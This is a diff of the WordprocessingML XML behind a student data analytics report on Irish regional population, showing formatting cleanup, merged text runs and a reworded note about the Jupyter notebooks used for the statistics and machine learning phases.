+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6395,66 +6257,6 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hase 0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - EDA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>Skewness:</w:t>
@@ -6607,41 +6409,13 @@
         </w:rPr>
         <w:t xml:space="preserve">or </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>distplots</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can be used to visualize skewness. However, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>distplots</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>distplots can be used to visualize skewness. However, distplots are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6729,7 +6503,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Figure 01: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6738,9 +6511,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>distplot</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">distplot </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6749,9 +6521,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>-</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6760,7 +6531,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>-</w:t>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6770,28 +6541,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Skewness</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Skewness </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6987,7 +6737,6 @@
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6999,7 +6748,6 @@
         </w:rPr>
         <w:t>BoxPlot</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7156,19 +6904,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">dentify </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>outliers</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>dentify outliers</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7308,9 +7045,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">: Boxplot  </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7319,28 +7055,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Boxplot  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> population by region</w:t>
+        <w:t>- population by region</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7428,15 +7143,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Outliers are data points that significantly differ from </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>the majority of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
+        <w:t>Outliers are data points that significantly differ from the majority of observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7521,6 +7228,12 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:tabs>
           <w:tab w:val="left" w:pos="916"/>
           <w:tab w:val="left" w:pos="1832"/>
@@ -7782,6 +7495,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F6BDB8" wp14:editId="11A0B567">
             <wp:extent cx="6193155" cy="1657350"/>
@@ -7891,7 +7605,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Insights:</w:t>
       </w:r>
     </w:p>
@@ -7989,27 +7702,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>ravel(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>) function.</w:t>
+        <w:t>Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy ravel() function.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8202,6 +7895,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">From the pie chart, we can observe that the biggest region in population Is the Dublin </w:t>
       </w:r>
       <w:r>
@@ -8358,7 +8052,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Overall, </w:t>
       </w:r>
       <w:r>
@@ -8368,27 +8061,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">the population of Ireland is becoming more concentrated in the Dublin region. This may be due to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>a number of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
+        <w:t>the population of Ireland is becoming more concentrated in the Dublin region. This may be due to a number of factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8423,6 +8096,17 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
@@ -8430,10 +8114,7 @@
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -8442,7 +8123,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">2.0 </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8452,17 +8134,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">2.0 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
         <w:t xml:space="preserve">Statistics for Data Analytics </w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
@@ -8472,84 +8143,11 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">We can use a set of tools and techniques for collecting, organizing, summarizing, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>analyzing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, and interpreting data.</w:t>
+        <w:t>We can use a set of tools and techniques for collecting, organizing, summarizing, analyzing, and interpreting data.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Statistics techniques were used in this project in </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>the both</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> notebook:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t>File</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>EDA_Jose_Mario.ipynb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">and </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Machine</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_Learning_Jose_Mario.ipynb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8557,38 +8155,244 @@
         <w:spacing w:line="288" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve">Statistical techniques were employed in this project within the Jupyter notebook named </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>MSC_DA_CA1_Jose_Mario.ipynb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>”,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> encompassing both </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>Phase 3, which focused on statistics, and Phase 4, which centered on machine learning</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
         </w:rPr>
         <w:t>By u</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sing the method </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t>describe</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
